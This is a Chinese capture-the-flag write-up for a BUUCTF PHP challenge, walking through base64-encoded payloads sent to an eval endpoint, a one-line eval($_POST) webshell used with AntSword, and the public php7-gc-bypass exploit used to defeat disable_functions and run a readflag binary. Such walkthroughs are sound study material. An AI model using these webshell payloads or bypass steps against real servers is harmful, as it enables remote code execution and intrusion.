前言
文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途!
题目
打开题目,看到class
以为是反序列化,但实际并不是,这里直接用$_REQUEST
传入了参数便可以利用了。
看到base64_decode
,说明我们的代码需要加密一下,尝试着直接传入c3lzdGVtKCdscycpOw==
(即为base64加密后的system('ls');
)
发现并不能返回数据,是难道是不能这么利用吗?
接着我尝试了一下cGhwaW5mbygpOw==
(即为base64加密后的phpinfo();
)
发现这个点是可以进行利用的,应该是php过滤了危险函数,在phpinfo中的disable_functions
可以看到!
尝试着用一句话来突破!
构造url:
http://81b9655b-0465-44c7-a7b4-df93034d612b.node3.buuoj.cn/?Ginkgo=cGhwaW5mbygpOw==
eval($_POST['abc']);
base64加密后为ZXZhbCgkX1BPU1RbJ2FiYyddKTs=
这边需要再用一个eval函数去包含一句话,我也不知道为什么,但亲测不加多个eval函数不能利用一句话,会报错
我这里用的是蚁剑
看flag发现看不了,是空白的,一时间不知道怎么办,再反过来看了看目录
看到有个文件readflag
,但里面是乱码
猜测就是运行它来读flag!
然后…看看wp(〃‘▽’〃)
看phpinfo发现版本是7.3.18,这个版本有漏洞
php7-gc-bypass漏洞利用PHP garbage collector程序中的堆溢出触发进而执行命令,影响范围为linux,php7.0-7.3
exp:
https://github.com/mm0r1/exploits/blob/master/php7-gc-bypass/exploit.php
拉下来后修改,改为执行readflag
修改后上传文件至tmp目录下(师傅都说这个目录才有权限执行,至少我是不知道权限在哪里看( ̄へ ̄)
然后再用之前的利用点进行包含exp文件读取flag
?Ginkgo=aW5jbHVkZSgnL3RtcC8xLnBocCcpOw==
include('/tmp/1.php');
加密后即为aW5jbHVkZSgnL3RtcC8xLnBocCcpOw==